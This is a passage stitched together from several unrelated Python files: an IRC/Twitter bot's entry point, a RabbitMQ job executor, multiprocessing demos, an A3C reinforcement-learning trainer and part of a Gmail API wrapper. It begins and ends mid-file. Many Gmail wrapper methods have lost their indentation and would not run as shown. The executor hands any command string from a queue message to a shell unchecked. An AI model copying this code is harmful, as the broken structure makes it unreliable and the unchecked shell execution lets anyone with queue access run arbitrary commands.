        (conf.get('twitter', 'apikey'), conf.get('twitter', 'apisecret')),
    )

    # one thread each for the irc bot, the celery listener, and the timer
    threads = [
        threading.Thread(target=bot.start, daemon=True),
        threading.Thread(
            target=create.celery_listener,
            args=(bot, celery, conf.get('celery', 'broker')),
            daemon=True,
        ),
        threading.Thread(target=timer, args=(bot,), daemon=True),
    ]
    for thread in threads:
        thread.start()

    # if any worker dies, take the whole process down so it can be restarted
    while True:
        for thread in threads:
            if not thread.is_alive():
                raise RuntimeError('Thread exited: {}'.format(thread))
        time.sleep(0.1)
# Run the bot when executed as a script.
if __name__ == '__main__':
    main()
|
executor.py | import json
import logging
import os
import socket
import subprocess
import sys
import threading
import time
import uuid
import pika
import shutil
# Connection settings, overridable through the environment.
rabbitmq_uri = os.getenv('RABBITMQ_URI', 'amqp://guest:guest@rabbitmq/%2F')
rabbitmq_queue = os.getenv('RABBITMQ_QUEUE', 'pecan')
# Command executed when a job message does not specify one itself.
default_application = os.getenv('APPLICATION', 'job.sh')
class Worker:
    """Runs a single job described by a rabbitmq message in a background thread.

    The receiver loop polls ``finished`` to know when the message may be acked.

    Fixes:
    - ``logging.info`` was called with several positional message strings; the
      logging module treats extra positional arguments as %-format args, which
      breaks formatting of a message without placeholders. The pieces are now
      one message with a single ``%s``.
    - the pecan.xml file is written through a context manager so it is closed
      even if the write fails.
    """

    def __init__(self, method, properties, body):
        self.method = method
        self.properties = properties
        self.body = body
        self.finished = False

    def runfunc(self):
        """Decode the message, run the requested command, and record the result."""
        logging.debug(self.body)
        jbody = json.loads(self.body.decode('UTF-8'))

        folder = jbody.get('folder')
        rebuild = jbody.get('rebuild')
        pecan_xml = jbody.get('pecan_xml')
        custom_application = jbody.get('custom_application')

        if rebuild is not None:
            logging.info("Rebuilding PEcAn with make")
            application = 'make'
            folder = '/pecan'
        elif pecan_xml is not None:
            # Passed entire pecan XML as a string
            logging.info("Running XML passed directly")
            try:
                os.mkdir(folder)
            except OSError as e:
                logging.info("Caught the following OSError. "
                             "If it's just that the directory exists, "
                             "this can probably be ignored: %s", e)
            workflow_path = os.path.join(folder, "workflow.R")
            shutil.copyfile("/work/workflow.R", workflow_path)
            with open(os.path.join(folder, "pecan.xml"), "w") as xml_file:
                xml_file.write(pecan_xml)
            # Set variables for execution
            application = "R CMD BATCH workflow.R"
        elif custom_application is not None:
            application = custom_application
        else:
            logging.info("Running default command: %s" % default_application)
            application = default_application

        logging.info("Running command: %s" % application)
        logging.info("Starting command in directory %s." % folder)
        try:
            output = subprocess.check_output(application, stderr=subprocess.STDOUT, shell=True, cwd=folder)
            status = 'OK'
        except subprocess.CalledProcessError as e:
            logging.exception("Error running job.")
            output = e.output
            status = 'ERROR'
        except Exception as e:
            logging.exception("Error running job.")
            output = str(e)
            status = 'ERROR'
        logging.info("Finished running job with status " + status)
        logging.info(output)

        # leave the result next to the job so callers can inspect it
        try:
            with open(os.path.join(folder, 'rabbitmq.out'), 'w') as out:
                out.write(str(output) + "\n")
                out.write(status + "\n")
        except Exception:
            logging.exception("Error writing status.")

        # done processing, set finished to true
        self.finished = True
# called for every message, this will start the program and ack message if all is ok.
def callback(ch, method, properties, body):
    """Pika delivery callback: start the job in a worker thread.

    Runs on the receiver's I/O thread. The job itself runs in a separate
    thread so this function returns immediately and the connection can
    keep processing heartbeats; receiver() polls the global `worker` and
    acks once it reports finished.
    """
    global worker
    # do not pass channel, pika is not threadsafe, only receiver is allowed to use channel
    worker = Worker(method, properties, body)
    thread = threading.Thread(target=worker.runfunc)
    thread.start()
# connect to rabbitmq and receive jobs, only this function can use the channel.
def receiver():
    """Connect to RabbitMQ and consume jobs until interrupted.

    Only this function may touch the pika channel (pika is not
    thread-safe); the actual work happens in the thread started by
    callback(). Acks are sent from here once the worker flags itself
    finished.
    """
    global worker

    # create connection to rabbitmq
    connection = pika.BlockingConnection(pika.URLParameters(rabbitmq_uri))
    channel = connection.channel()

    # make sure queue exists
    channel.queue_declare(queue=rabbitmq_queue, durable=True)

    # receive 1 message at a time, call callback function
    channel.basic_qos(prefetch_count=1)
    channel.basic_consume(on_message_callback=callback, queue=rabbitmq_queue)

    # receive messages
    worker = None
    logging.info('[*] Waiting for messages. To exit press CTRL+C')
    try:
        while True:
            # use polling to allow for heartbeats, the actual work is done
            # in another thread which should not talk in channel!
            channel.connection.process_data_events(time_limit=1)  # 1 second
            if worker and worker.finished:
                channel.basic_ack(delivery_tag=worker.method.delivery_tag)
                worker = None
    except KeyboardInterrupt:
        pass
    finally:
        connection.close()
# Script entry point: configure logging, then block in receiver() consuming jobs.
if __name__ == "__main__":
    logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s',
                        level=logging.INFO)
    # Silence noisy per-connection logging from requests/urllib3.
    logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)

    # start listening for new jobs
    receiver()
|
__main__.py | import multiprocessing
from multiprocessing import Queue, Process
import time
def listen(input_q):
    """Consume items from input_q and broadcast them to registered queues.

    Protocol on ``input_q``:
      * ``None``                     -> shut down and return.
      * a ``multiprocessing`` queue  -> register it as a broadcast target.
      * anything else                -> print it and forward a copy to every
                                        registered output queue.
    """
    output_qs = []
    try:
        while True:
            item = input_q.get()
            # BUG FIX: compare against None with `is`, not `==`.
            if item is None:
                return
            elif isinstance(item, multiprocessing.queues.Queue):
                print("ADDING NEW OUTPUT QUEUE")
                output_qs.append(item)
            else:
                print("#"*50)
                print(item)
                print("#"*50)
                for q in output_qs:
                    q.put(item)
    except KeyboardInterrupt:
        pass
class A:
    """Thin wrapper carrying a queue so it can be shipped to a child process.

    Args:
        q: The queue to wrap (exposed as the ``q`` attribute).
    """

    def __init__(self, q):
        self.q = q

    def __repr__(self):
        # Added for debuggability; callers relying only on `.q` are unaffected.
        return f"{type(self).__name__}(q={self.q!r})"
def run_a(a):
    """Block until one item arrives on a's queue, then print it."""
    received = a.q.get()
    print(received)
# Demo: wrap a queue in an A instance, hand it to a child process, and
# send one message through it.
if __name__ == "__main__":
    a = A(Queue())
    p = Process(target=run_a, args=(a,))
    p.start()
    a.q.put("hello")
    p.join()
"""
if __name__ == "__main__":
input_q = Queue()
output_qs = []
p = Process(target=listen, args=(input_q, ))
p.start()
try:
while True:
time.sleep(0.2)
for q in output_qs:
if q.empty():
continue
print(f"{q}: {q.get()}")
cmd = input(">>> ")
if cmd == "exit":
break
elif cmd == "add":
output_qs.append(Queue())
input_q.put(output_qs[-1])
input_q.put(cmd)
except KeyboardInterrupt:
pass
print("")
input_q.put(None)
p.join()
"""
|
main.py | #!/usr/bin/env python3
import sys, os
from threading import Thread
import gym
import threading
import numpy as np
import tensorflow as tf
from a3c import A3C_Worker, A3C_Net
def main():
    """Train an A3C agent on CartPole using several asynchronous workers.

    Builds one global network plus ``worker_num`` local worker networks
    sharing a single TF session, trains the workers in parallel threads
    while the global net applies gradients, then optionally runs a test
    episode per worker.
    """
    # Training configuration.
    worker_num = 4
    global_train_steps = 1000  # 50000 = 1 million steps
    test = True
    env_name = 'CartPole-v0'

    # Init global net and workers (all share one session/coordinator).
    workers = []
    coordinator = tf.train.Coordinator()
    sess = tf.Session()
    env = gym.make(env_name)
    env.seed(0)
    global_net = A3C_Net(env, 'global', sess)
    for i in range(worker_num):
        name = 'worker_%s' % i
        local_net = A3C_Net(env, name, sess)
        workers.append(A3C_Worker(coordinator, global_net, local_net,
            name))
    print('training for %s batches\n' % global_train_steps)

    # Start training asynchronously, one thread per worker.
    threads = []
    for i, worker in enumerate(workers):
        env = gym.make(env_name)
        env.seed(i)
        # BUG FIX: bind the loop variables as lambda defaults. A bare
        # closure captures `worker`/`env` late, so every thread could end
        # up training the last worker on the last environment.
        work = lambda worker=worker, env=env: worker.train(env,
                                                          global_train_steps)
        thread = Thread(target=work)
        thread.start()
        threads.append(thread)

    # Apply gradients on the global net while the worker threads run.
    global_net.update_loop(global_train_steps)
    coordinator.join(threads)  # wait for threads to finish

    # Output training info.
    print()  # BUG FIX: a bare `print` is a no-op expression in Python 3
    for worker in workers:
        print('[*] %s trained for: %s' % (worker.scope,
            worker.local_net.get_step()))
    print('[*] global trained for: %s' % global_net.get_step())

    # Test each worker on a freshly seeded environment.
    if test:
        for i, worker in enumerate(workers):
            env = gym.make(env_name)
            env.seed(i)
            # BUG FIX: previously an unseeded throwaway env was passed to
            # test() while the seeded one above was discarded.
            worker.test(env)
            env.close()
# Script entry point.
if __name__ == '__main__':
    main()
|
mp_test.py | import multiprocessing as mp
import os
# https://www.maxlist.xyz/2020/03/15/python-threading/
class Dosomething:
    """Spawn five worker processes that each print their task id and PID."""

    def __init__(self):
        # Keep references to the spawned processes so run() can join them.
        self.p_list = []

    def dosomething(self, i):
        """Print the task index and the worker process id."""
        print('第' + str(i))
        print('多程序 ID:' + str(os.getpid()))

    def run(self):
        """Start five processes and wait for all of them to finish."""
        for i in range(5):
            # BUG FIX: Process args must be a tuple; ("x") is just a
            # string, which only worked by accident for 1-char indices.
            self.p_list.append(
                mp.Process(target=self.dosomething, args=(str(i),)))
            self.p_list[i].start()
        for p in self.p_list:
            p.join()
# Demo entry point: spawn the worker processes.
if __name__ == "__main__":
    d = Dosomething()
    d.run()
|
gmail.py | """
File: gmail.py
--------------
Home to the main Gmail service object. Currently supports sending mail (with
attachments) and retrieving mail with the full suite of Gmail search options.
"""
import base64
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import html
import math
import mimetypes
import os
import re
import threading
from typing import List, Optional
from bs4 import BeautifulSoup
import dateutil.parser as parser
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
from simplegmail import label
from simplegmail.attachment import Attachment
from simplegmail.label import Label
from simplegmail.message import Message
class Gmail(object):
"""
The Gmail class which serves as the entrypoint for the Gmail service API.
Args:
client_secret_file: The name of the user's client secret file.
Attributes:
client_secret_file (str): The name of the user's client secret file.
service (googleapiclient.discovery.Resource): The Gmail service object.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
'https://www.googleapis.com/auth/gmail.modify',
'https://www.googleapis.com/auth/gmail.settings.basic'
]
# If you don't have a client secret file, follow the instructions at:
# https://developers.google.com/gmail/api/quickstart/python
# Make sure the client secret file is in the root directory of your app.
    def __init__(
        self,
        client_secret_file: str = 'client_secret.json',
        creds_file: str = 'gmail_token.json',
        _creds: Optional[client.OAuth2Credentials] = None
    ) -> None:
        """Authorize the account (running the OAuth flow if needed) and
        build the Gmail API service object.

        Args:
            client_secret_file: Path to the OAuth client secret file.
            creds_file: Path where access/refresh tokens are cached.
            _creds: Pre-authorized credentials; used internally to share
                credentials (e.g. between download threads) without
                re-reading the token store.

        Raises:
            FileNotFoundError: The client secret file does not exist.
        """
        self.client_secret_file = client_secret_file
        self.creds_file = creds_file

        try:
            # The file gmail_token.json stores the user's access and refresh
            # tokens, and is created automatically when the authorization flow
            # completes for the first time.
            if _creds:
                self.creds = _creds
            else:
                store = file.Storage(self.creds_file)
                self.creds = store.get()

            # NOTE(review): if _creds is supplied but invalid, `store` below
            # is unbound — confirm callers always pass valid credentials.
            if not self.creds or self.creds.invalid:
                # Will ask you to authenticate an account in your browser.
                flow = client.flow_from_clientsecrets(
                    self.client_secret_file, self._SCOPES
                )

                flags = tools.argparser.parse_args([])
                self.creds = tools.run_flow(flow, store, flags)

            self._service = build(
                'gmail', 'v1', http=self.creds.authorize(Http()),
                cache_discovery=False
            )

        except InvalidClientSecretsError:
            raise FileNotFoundError(
                "Your 'client_secret.json' file is nonexistent. Make sure "
                "the file is in the root directory of your application. If "
                "you don't have a client secrets file, go to https://"
                "developers.google.com/gmail/api/quickstart/python, and "
                "follow the instructions listed there."
            )
    @property
    def service(self) -> 'googleapiclient.discovery.Resource':
        """Return the Gmail service object, refreshing the token if expired."""
        # Since the token is only used through calls to the service object,
        # this ensures that the token is always refreshed before use.
        if self.creds.access_token_expired:
            self.creds.refresh(Http())

        return self._service
def send_message(
self,
sender: str,
to: str,
subject: str = '',
msg_html: Optional[str] = None,
msg_plain: Optional[str] = None,
cc: Optional[List[str]] = None,
bcc: Optional[List[str]] = None,
attachments: Optional[List[str]] = None,
signature: bool = False,
user_id: str = 'me'
) -> Message:
"""
Sends an email.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
msg_plain: The plain text alternate message of the email. This is
often displayed on slow or old browsers, or if the HTML message
is not provided.
cc: The list of email addresses to be cc'd.
bcc: The list of email addresses to be bcc'd.
attachments: The list of attachment file names.
signature: Whether the account signature should be added to the
message.
user_id: The address of the sending account. 'me' for the
default address associated with the account.
Returns:
The Message object representing the sent message.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
msg = self._create_message(
sender, to, subject, msg_html, msg_plain, cc=cc, bcc=bcc,
attachments=attachments, signature=signature, user_id=user_id
)
try:
req = self.service.users().messages().send(userId='me', body=msg)
res = req.execute()
return self._build_message_from_ref(user_id, res, 'reference')
except HttpError as error:
# Pass along the error
raise error
def get_unread_inbox(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference'
) -> List[Message]:
"""
Gets unread messages from your inbox.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Labels that messages must match.
query: A Gmail query to match.
attachments: Accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.INBOX)
return self.get_unread_messages(user_id, labels, query)
def get_starred_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets starred messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.STARRED)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_important_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets messages marked important from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.IMPORTANT)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_unread_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets unread messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.UNREAD)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_drafts(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets drafts saved in your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.DRAFT)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_sent_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets sent messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SENT)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_trash_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference'
) -> List[Message]:
"""
Gets messages in your trash from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.TRASH)
return self.get_messages(user_id, labels, query, attachments, True)
def get_spam_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference'
) -> List[Message]:
"""
Gets messages marked as spam from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SPAM)
return self.get_messages(user_id, labels, query, attachments, True)
def get_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets messages from your account.
Args:
user_id: the user's email address. Default 'me', the authenticated
user.
labels: label IDs messages must match.
query: a Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels_ids = [
lbl.id if isinstance(lbl, Label) else lbl for lbl in labels
]
try:
response = self.service.users().messages().list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash
).execute()
message_refs = []
if 'messages' in response: # ensure request was successful
message_refs.extend(response['messages'])
while 'nextPageToken' in response:
page_token = response['nextPageToken']
response = self.service.users().messages().list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash,
pageToken=page_token
).execute()
message_refs.extend(response['messages'])
return self._get_messages_from_refs(user_id, message_refs,
attachments)
except HttpError as error:
# Pass along the error
raise error
def list_labels(self, user_id: str = 'me') -> List[Label]:
"""
Retrieves all labels for the specified user.
These Label objects are to be used with other functions like
modify_labels().
Args:
user_id: The user's email address. By default, the authenticated
user.
Returns:
The list of Label objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
try:
res = self.service.users().labels().list(
userId=user_id
).execute()
except HttpError as error:
# Pass along the error
raise error
else:
labels = [Label(name=x['name'], id=x['id']) for x in res['labels']]
return labels
    def _get_messages_from_refs(
        self,
        user_id: str,
        message_refs: List[dict],
        attachments: str = 'reference',
        parallel: bool = True
    ) -> List[Message]:
        """
        Retrieves the actual messages from a list of references.

        Args:
            user_id: The account the messages belong to.
            message_refs: A list of message references with keys id, threadId.
            attachments: Accepted values are 'ignore' which completely ignores
                all attachments, 'reference' which includes attachment
                information but does not download the data, and 'download'
                which downloads the attachment data to store locally. Default
                'reference'.
            parallel: Whether to retrieve messages in parallel. Default true.
                Currently parallelization is always on, since there is no
                reason to do otherwise.

        Returns:
            A list of Message objects.

        Raises:
            googleapiclient.errors.HttpError: There was an error executing the
                HTTP request.
        """
        if not message_refs:
            return []

        if not parallel:
            return [self._build_message_from_ref(user_id, ref, attachments)
                    for ref in message_refs]

        max_num_threads = 12  # empirically chosen, prevents throttling
        target_msgs_per_thread = 10  # empirically chosen
        num_threads = min(
            math.ceil(len(message_refs) / target_msgs_per_thread),
            max_num_threads
        )
        # Contiguous batches: thread i handles refs [i*batch, (i+1)*batch).
        batch_size = math.ceil(len(message_refs) / num_threads)
        message_lists = [None] * num_threads

        def thread_download_batch(thread_num):
            # Each thread builds its own Gmail (and service) object from the
            # shared credentials — presumably because the service object is
            # not safe to share across threads; confirm before changing.
            gmail = Gmail(_creds=self.creds)

            start = thread_num * batch_size
            end = min(len(message_refs), (thread_num + 1) * batch_size)
            message_lists[thread_num] = [
                gmail._build_message_from_ref(
                    user_id, message_refs[i], attachments
                )
                for i in range(start, end)
            ]

        threads = [
            threading.Thread(target=thread_download_batch, args=(i,))
            for i in range(num_threads)
        ]

        for t in threads:
            t.start()

        for t in threads:
            t.join()

        # Flatten the per-thread batches, preserving the original ref order.
        return sum(message_lists, [])
    def _build_message_from_ref(
        self,
        user_id: str,
        message_ref: dict,
        attachments: str = 'reference'
    ) -> Message:
        """
        Creates a Message object from a reference.

        Args:
            user_id: The username of the account the message belongs to.
            message_ref: The message reference object returned from the Gmail
                API.
            attachments: Accepted values are 'ignore' which completely ignores
                all attachments, 'reference' which includes attachment
                information but does not download the data, and 'download' which
                downloads the attachment data to store locally. Default
                'reference'.

        Returns:
            The Message object.

        Raises:
            googleapiclient.errors.HttpError: There was an error executing the
                HTTP request.
        """
        try:
            # Get message JSON
            message = self.service.users().messages().get(
                userId=user_id, id=message_ref['id']
            ).execute()
        except HttpError as error:
            # Pass along the error
            raise error
        else:
            msg_id = message['id']
            thread_id = message['threadId']
            label_ids = []
            if 'labelIds' in message:
                # NOTE(review): this fetches the full label list per message —
                # one extra API round trip each; consider caching upstream.
                user_labels = {x.id: x for x in self.list_labels(user_id=user_id)}
                label_ids = [user_labels[x] for x in message['labelIds']]
            snippet = html.unescape(message['snippet'])

            payload = message['payload']
            headers = payload['headers']

            # Get header fields (date, from, to, subject)
            date = ''
            sender = ''
            recipient = ''
            subject = ''
            msg_hdrs = {}
            for hdr in headers:
                if hdr['name'].lower() == 'date':
                    try:
                        # Normalize to the local timezone; fall back to the
                        # raw header when parsing fails.
                        date = str(parser.parse(hdr['value']).astimezone())
                    except Exception:
                        date = hdr['value']
                elif hdr['name'].lower() == 'from':
                    sender = hdr['value']
                elif hdr['name'].lower() == 'to':
                    recipient = hdr['value']
                elif hdr['name'].lower() == 'subject':
                    subject = hdr['value']

                # All headers (including the special ones above) are recorded.
                msg_hdrs[hdr['name']] = hdr['value']

            parts = self._evaluate_message_payload(
                payload, user_id, message_ref['id'], attachments
            )

            plain_msg = None
            html_msg = None
            attms = []
            # Concatenate multiple text parts; collect attachment parts.
            for part in parts:
                if part['part_type'] == 'plain':
                    if plain_msg is None:
                        plain_msg = part['body']
                    else:
                        plain_msg += '\n' + part['body']
                elif part['part_type'] == 'html':
                    if html_msg is None:
                        html_msg = part['body']
                    else:
                        html_msg += '<br/>' + part['body']
                elif part['part_type'] == 'attachment':
                    attm = Attachment(self.service, user_id, msg_id,
                                      part['attachment_id'], part['filename'],
                                      part['filetype'], part['data'])
                    attms.append(attm)

            return Message(self.service, self.creds, user_id, msg_id,
                           thread_id, recipient, sender, subject, date, snippet,
                           plain_msg, html_msg, label_ids, attms, msg_hdrs)
    def _evaluate_message_payload(
        self,
        payload: dict,
        user_id: str,
        msg_id: str,
        attachments: str = 'reference'
    ) -> List[dict]:
        """
        Recursively evaluates a message payload.

        Args:
            payload: The message payload object (response from Gmail API).
            user_id: The current account address (default 'me').
            msg_id: The id of the message.
            attachments: Accepted values are 'ignore' which completely ignores
                all attachments, 'reference' which includes attachment
                information but does not download the data, and 'download' which
                downloads the attachment data to store locally. Default
                'reference'.

        Returns:
            A list of message parts.

        Raises:
            googleapiclient.errors.HttpError: There was an error executing the
                HTTP request.
        """
        if 'attachmentId' in payload['body']:  # if it's an attachment
            if attachments == 'ignore':
                return []

            att_id = payload['body']['attachmentId']
            filename = payload['filename']
            if not filename:
                filename = 'unknown'

            obj = {
                'part_type': 'attachment',
                'filetype': payload['mimeType'],
                'filename': filename,
                'attachment_id': att_id,
                'data': None
            }

            if attachments == 'reference':
                return [obj]

            else:  # attachments == 'download'
                # Small attachments may be inlined in the payload itself;
                # otherwise fetch the data with a separate API call.
                if 'data' in payload['body']:
                    data = payload['body']['data']
                else:
                    res = self.service.users().messages().attachments().get(
                        userId=user_id, messageId=msg_id, id=att_id
                    ).execute()
                    data = res['data']

                file_data = base64.urlsafe_b64decode(data)
                obj['data'] = file_data
                return [obj]

        elif payload['mimeType'] == 'text/html':
            data = payload['body']['data']
            data = base64.urlsafe_b64decode(data)
            body = BeautifulSoup(data, 'lxml', from_encoding='utf-8').body
            return [{ 'part_type': 'html', 'body': str(body) }]

        elif payload['mimeType'] == 'text/plain':
            data = payload['body']['data']
            data = base64.urlsafe_b64decode(data)
            body = data.decode('UTF-8')
            return [{ 'part_type': 'plain', 'body': body }]

        elif payload['mimeType'].startswith('multipart'):
            # Multipart container: recurse into each child part and merge.
            ret = []
            if 'parts' in payload:
                for part in payload['parts']:
                    ret.extend(self._evaluate_message_payload(part, user_id, msg_id,
                                                              attachments))
            return ret

        # Unknown leaf mime type: nothing to extract.
        return []
    def _create_message(
        self,
        sender: str,
        to: str,
        subject: str = '',
        msg_html: Optional[str] = None,
        msg_plain: Optional[str] = None,
        cc: Optional[List[str]] = None,
        bcc: Optional[List[str]] = None,
        attachments: Optional[List[str]] = None,
        signature: bool = False,
        user_id: str = 'me'
    ) -> dict:
        """
        Creates the raw email message to be sent.

        Args:
            sender: The email address the message is being sent from.
            to: The email address the message is being sent to.
            subject: The subject line of the email.
            msg_html: The HTML message of the email.
            msg_plain: The plain text alternate message of the email (for slow
                or old browsers).
            cc: The list of email addresses to be Cc'd.
            bcc: The list of email addresses to be Bcc'd
            attachments: A list of attachment file paths.
            signature: Whether the account signature should be added to the
                message. Will add the signature to your HTML message only, or a
                create a HTML message if none exists.
            user_id: The account the signature is looked up for.

        Returns:
            The message dict.
        """
        msg = MIMEMultipart('mixed' if attachments else 'alternative')
        msg['To'] = to
        msg['From'] = sender
        msg['Subject'] = subject

        if cc:
            msg['Cc'] = ', '.join(cc)

        if bcc:
            msg['Bcc'] = ', '.join(bcc)

        if signature:
            # Extract the bare address from "Display Name <addr@host>" forms.
            m = re.match(r'.+\s<(?P<addr>.+@.+\..+)>', sender)
            address = m.group('addr') if m else sender
            account_sig = self._get_alias_info(address, user_id)['signature']

            if msg_html is None:
                msg_html = ''

            msg_html += "<br /><br />" + account_sig

        # With attachments the outer message is 'mixed' and the text
        # alternatives nest one level down; without attachments msg itself
        # holds the text parts directly.
        attach_plain = MIMEMultipart('alternative') if attachments else msg
        attach_html = MIMEMultipart('related') if attachments else msg

        if msg_plain:
            attach_plain.attach(MIMEText(msg_plain, 'plain'))

        if msg_html:
            attach_html.attach(MIMEText(msg_html, 'html'))

        if attachments:
            attach_plain.attach(attach_html)
            msg.attach(attach_plain)

            self._ready_message_with_attachments(msg, attachments)

        return {
            'raw': base64.urlsafe_b64encode(msg.as_string().encode()).decode()
        }
def _ready_message_with_attachments(
self,
msg: MIMEMultipart,
attachments: List[str]
) -> None:
"""
Converts attachment filepaths to MIME objects and adds them to msg.
Args:
msg: The message to add attachments to.
attachments: A list of attachment file paths.
"""
for filepath in attachments:
content_type, encoding = mimetypes.guess_type(filepath)
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
main_type, sub_type = content_type.split('/', 1)
with open(filepath, 'rb') as file:
raw_data = file.read()
attm: MIMEBase
if main_type == 'text':
attm = MIMEText(raw_data.decode('UTF-8'), _subtype=sub_type)
elif main_type == 'image':
attm = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == 'audio':
attm = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == 'application':
attm = MIMEApplication(raw_data, _subtype=sub_type)
else:
attm = MIMEBase(main_type, sub_type)
attm.set_payload(raw_data)
fname = os.path.basename(filepath)
attm.add_header('Content-Disposition', 'attachment', filename=fname)
msg.attach(attm)
def _get_alias_info(
self,
send_as_email: str,
user_id: str = 'me'
) -> dict:
"""
Returns the alias info of an email address on the authenticated
account.
Response data is of the following form:
{
"sendAsEmail": string,
"displayName": string,
"replyToAddress": string,
"signature": string,
"isPrimary": boolean,
"isDefault": boolean,
"treatAsAlias": boolean,
"smtpMsa": {
"host": string,
"port": integer,
"username": string,
"password": string,
"securityMode": string
},
"verificationStatus": string
}
Args:
send_as_email: The alias account information is requested for
